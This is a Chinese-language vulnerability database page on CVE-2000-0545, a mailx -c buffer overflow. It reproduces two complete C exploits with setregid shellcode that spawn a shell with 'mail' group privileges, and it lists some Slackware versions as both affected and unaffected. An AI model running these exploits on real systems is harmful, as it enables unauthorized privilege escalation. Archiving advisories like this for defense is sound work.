CVE-2000-0545
CVSS4.6
发布时间 :2000-08-08 00:00:00
修订时间 :2008-09-10 15:05:01
NMCOES    

[原文]Buffer overflow in mailx mail command (aka Mail) on Linux systems allows local users to gain privileges via a long -c (carbon copy) parameter.


[CNNVD]BSD mailx 8.1.1-10缓冲区溢出漏洞(CNNVD-200008-002)

        Linux系统中的mailx邮件命令(又称为Mail)存在缓冲区溢出漏洞。本地用户借助超长-c (carbon副本)参数提升特权。

- CVSS (基础分值)

CVSS分值: 4.6 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:sgi:mailx:6.4
cpe:/a:sgi:mailx:6.3
cpe:/a:sgi:mailx:4
cpe:/a:sgi:mailx:6.1
cpe:/a:sgi:mailx:3
cpe:/a:sgi:mailx:5
cpe:/a:sgi:mailx:6.5
cpe:/a:sgi:mailx:6.2
cpe:/a:sgi:mailx:6.0.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0545
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0545
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200008-002
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/1305
(UNKNOWN)  BID  1305
http://www.debian.org/security/2000/20000605
(UNKNOWN)  DEBIAN  20000605 mailx: mail group exploit in mailx
http://archives.neohapsis.com/archives/bugtraq/2000-05/0435.html
(VENDOR_ADVISORY)  BUGTRAQ  20000602 /usr/bin/Mail exploit for Slackware 7.0 (mail-slack.c)

- 漏洞信息

BSD mailx 8.1.1-10缓冲区溢出漏洞
中危 缓冲区溢出
2000-08-08 00:00:00 2005-10-20 00:00:00
本地  
        Linux系统中的mailx邮件命令(又称为Mail)存在缓冲区溢出漏洞。本地用户借助超长-c (carbon副本)参数提升特权。

- 公告与补丁

        The following patch was designed specifically for mailx 8.1.1-10 distributed with Debian, but should work on other distributions as well.
        Caldera has released packages that fix the vulnerability.
        BSD mailx 8.1.1 -10
        

- 漏洞信息 (19991)

BSD mailx 8.1.1 -10 Buffer Overflow Vulnerability (1) (EDBID:19991)
linux local
2000-06-02 Verified
0 Paulo Ribeiro
N/A [点击下载]
source: http://www.securityfocus.com/bid/1305/info

Some Linux distributions ship with BSD mailx 8.1.1-10 (On Slackware 7.x it can be found as /usr/bin/Mail).

A vulnerability exists in the 'mail' program, part of the Berkeley mailx package. The 'mail' program contains a buffer overflow condition that is present when the -c parameter is used at the command line.

On systems where it is installed setgid, this vulnerability can be exploited to gain group 'mail' privileges.

/*
 * mail-slak.c (C) 2000 Paulo Ribeiro <prrar@nitnet.com.br>
 *
 * Exploit for /usr/bin/Mail.
 * Made specially for Slackware Linux 7.0.
 * Based on mailx.c by funkySh.
 *
 * OBS.: Without fprintf(stderr) is not possible to print the message.
 *
 * USAGE:
 * slack$ ./mail-slak
 * type '.' and enter: .
 * Cc: too long to edit
 * sh-2.03$ id
 * uid=1000(user) gid=12(mail) groups=100(users)
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

char buffer[10000];
char shellcode[] =     
"\x31\xdb\x31\xc9\xbb\xff\xff\xff\xff\xb1\x0c\x31"
                       
"\xc0\xb0\x47\xcd\x80\x31\xdb\x31\xc9\xb3\x0c\xb1"
                       
"\x0c\x31\xc0\xb0\x47\xcd\x80\xeb\x1f\x5e\x89\x76"
                       
"\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89"
                       
"\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89"
                        "\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
               
unsigned long getesp(void)
{
        __asm__("movl %esp,%eax");
}

int main(int argc, char **argv)
{
        int x;
        long addr = getesp() - 18000;

        memset(buffer, 0x90, 10000);
        memcpy(buffer + 800, shellcode, strlen(shellcode));

        for(x = 876; x < 9998; x += 4)
                *(int *)&buffer[x] = addr;

        fprintf(stderr, "type '.' and enter: ");

        execl("/usr/bin/Mail", "/usr/bin/Mail", "nobody", "-s",
                "blah", "-c", buffer, 0);
}

/* mail-slack.c: EOF */














		

- 漏洞信息 (19992)

BSD mailx 8.1.1 -10 Buffer Overflow Vulnerability (2) (EDBID:19992)
linux local
1999-07-03 Verified
0 funkysh
N/A [点击下载]
source: http://www.securityfocus.com/bid/1305/info
 
Some Linux distributions ship with BSD mailx 8.1.1-10 (On Slackware 7.x it can be found as /usr/bin/Mail).
 
A vulnerability exists in the 'mail' program, part of the Berkeley mailx package. The 'mail' program contains a buffer overflow condition that is present when the -c parameter is used at the command line.
 
On systems where it is installed setgid, this vulnerability can be exploited to gain group 'mail' privileges.

 /*
  * ..just couse it is no longer secret :>
  *
  * mailx sploit (linux x86)
  * funkySh 3/07/99
  * tested under Slackware 3.6,4.0,7.0  offset = 0-500
  *              Debian  2.0r2,2.1,2.2  offset = -7000  ..ugh ;]
  *
  * buffer overrun in cc-addr option, gives "mail" group privileges
  * (if mailx is installed setgid mail).
  * Remember to define GID - it is different on Slack/Debian
  *
  */
 
 #include <stdio.h>
 
 #define GID    "\x08"  // Debian
 //#define GID    "\x0c"  // Slackware
 
 char code[] = "\x31\xdb\x31\xc9\xbb\xff\xff\xff\xff\xb1"GID"\x31"
               "\xc0\xb0\x47\xcd\x80\x31\xdb\x31\xc9\xb3"GID"\xb1"
                GID"\x31\xc0\xb0\x47\xcd\x80\xeb\x1f\x5e\x89\x76"
               "\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89"
               "\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89"
               "\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
               /* setregid + generic shell code */
 
 #define BUFFER 10000
 #define NOP 0x90
 #define PATH "/usr/bin/Mail"
 
 char buf[BUFFER];
 
 unsigned long getesp(void) {
    __asm__("movl %esp,%eax");
    }
 int main(int argc, char * argv[])
 {
   int i, offset = 0;
   long address;
   if(argc > 1) offset = atoi(argv[1]);
   address = getesp() -11000 + offset;
   memset(buf,NOP,BUFFER);
   memcpy(buf+800,code,strlen(code));
   for(i=876;i<BUFFER-2;i+=4)
     *(int *)&buf[i]=address;
   fprintf (stderr, "Hit '.' to get shell..\n");
   execl(PATH, PATH, "x","-s","x","-c", buf,0);
 }
 
		

- 漏洞信息

13690
Multiple Unix mailx mail -c Parameter Local Overflow
Local Access Required Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public Third-party Verified

- 漏洞描述

- 时间线

1998-09-28 Unknow
Unknow Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, SGI has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

BSD mailx 8.1.1-10 Buffer Overflow Vulnerability
Boundary Condition Error 1305
No Yes
2000-06-02 12:00:00 2009-07-11 02:56:00
Exploit posted to BugTraq on June 2, 2000 by Paulo Ribeiro <prrar@nitnet.com.br>

- 受影响的程序版本

BSD mailx 8.1.1 -10
+ Caldera OpenLinux 2.3
- Debian Linux 2.2
- Debian Linux 2.1
- Debian Linux 2.0 r2
+ SCO eDesktop 2.4
+ SCO eServer 2.3.1
- Slackware Linux 4.0
- Slackware Linux 3.6
- Slackware OpenLinux 7.0
Slackware Linux 3.9
Slackware Linux 3.5
Slackware Linux 3.4
Slackware Linux 3.3
Slackware Linux 3.2
Slackware Linux 3.1

- 不受影响的程序版本

Slackware Linux 3.9
Slackware Linux 3.5
Slackware Linux 3.4
Slackware Linux 3.3
Slackware Linux 3.2
Slackware Linux 3.1

- 漏洞讨论

Some Linux distributions ship with BSD mailx 8.1.1-10 (On Slackware 7.x it can be found as /usr/bin/Mail).

A vulnerability exists in the 'mail' program, part of the Berkeley mailx package. The 'mail' program contains a buffer overflow condition that is present when the -c parameter is used at the command line.

On systems where it is installed setgid, this vulnerability can be exploited to gain group 'mail' privileges.

- 漏洞利用

Both exploits work with Slackware Linux; use mail-deb.c to test Debian distributions.

- 解决方案

The following patch was designed specifically for mailx 8.1.1-10 distributed with Debian, but should work on other distributions as well.

Caldera has released packages that fix the vulnerability.


BSD mailx 8.1.1 -10

- 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站